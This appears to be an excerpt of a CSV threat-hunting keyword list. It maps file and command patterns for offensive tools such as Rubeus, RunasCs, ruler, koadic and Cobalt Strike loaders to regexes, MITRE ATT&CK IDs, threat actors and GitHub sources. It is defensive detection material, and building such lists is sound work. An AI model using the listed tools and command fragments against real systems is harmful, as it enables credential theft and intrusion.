"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#linux","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","10592"
"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","10593"
"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10594"
"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10595"
"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10596"
"*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10597"
"*/Rubeus.git*",".{0,1000}\/Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10598"
"*/Rubeus.ps1*",".{0,1000}\/Rubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10599"
"*/Rubeus/*",".{0,1000}\/Rubeus\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10600"
"*/Rubeus-Rundll32.git*",".{0,1000}\/Rubeus\-Rundll32\.git.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10601"
"*/Rubeus-Rundll32/*",".{0,1000}\/Rubeus\-Rundll32\/.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10602"
"*/Rudrastra.git*",".{0,1000}\/Rudrastra\.git.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","10603"
"*/ruler --domain *",".{0,1000}\/ruler\s\-\-domain\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10604"
"*/ruler --email *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10605"
"*/ruler -k -d * dump -o *",".{0,1000}\/ruler\s\-k\s\-d\s.{0,1000}\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","10606"
"*/ruler --url*",".{0,1000}\/ruler\s\-\-url.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10607"
"*/rulerforms.go*",".{0,1000}\/rulerforms\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10608"
"*/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I*",".{0,1000}\/run\s\/tn\s\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\s\/I.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#scheduledtask","command","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10609"
"*/run/leet.pl*",".{0,1000}\/run\/leet\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","10610"
"*/run/tor/socks*",".{0,1000}\/run\/tor\/socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10611"
"*/run/tor/tor.pid*",".{0,1000}\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10612"
"*/run_as_psh.*",".{0,1000}\/run_as_psh\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10613"
"*/RunasCs.cs*",".{0,1000}\/RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10614"
"*/RunasCs.exe*",".{0,1000}\/RunasCs\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10615"
"*/RunasCs.exe*",".{0,1000}\/RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10616"
"*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10617"
"*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10618"
"*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10619"
"*/RunasCs/releases/download/*",".{0,1000}\/RunasCs\/releases\/download\/.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10620"
"*/RunasCs_binaries.zip*",".{0,1000}\/RunasCs_binaries\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10621"
"*/RunasCs_x86.zip*",".{0,1000}\/RunasCs_x86\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10622"
"*/runasppl.py*",".{0,1000}\/runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10623"
"*/RunAsWinTcb.git*",".{0,1000}\/RunAsWinTcb\.git.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","10624"
"*/RunAsWinTcb.iml*",".{0,1000}\/RunAsWinTcb\.iml.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","10625"
"*/runcalc.dll*",".{0,1000}\/runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10626"
"*/runcmd.lua*",".{0,1000}\/runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10627"
"*/runcmd2.lua*",".{0,1000}\/runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10628"
"*/rundll32.cmd*",".{0,1000}\/rundll32\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10629"
"*/rundll32_js*",".{0,1000}\/rundll32_js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10630"
"*/RunOF/RunOF/*",".{0,1000}\/RunOF\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","10631"
"*/RunPEinMemory.exe*",".{0,1000}\/RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10632"
"*/RunPEinMemory64.exe*",".{0,1000}\/RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10633"
"*/runshellcode.*",".{0,1000}\/runshellcode\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","10634"
"*/runswhide.lua*",".{0,1000}\/runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10635"
"*/RuralBishop.git*",".{0,1000}\/RuralBishop\.git.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","10636"
"*/rusers.nse*",".{0,1000}\/rusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10637"
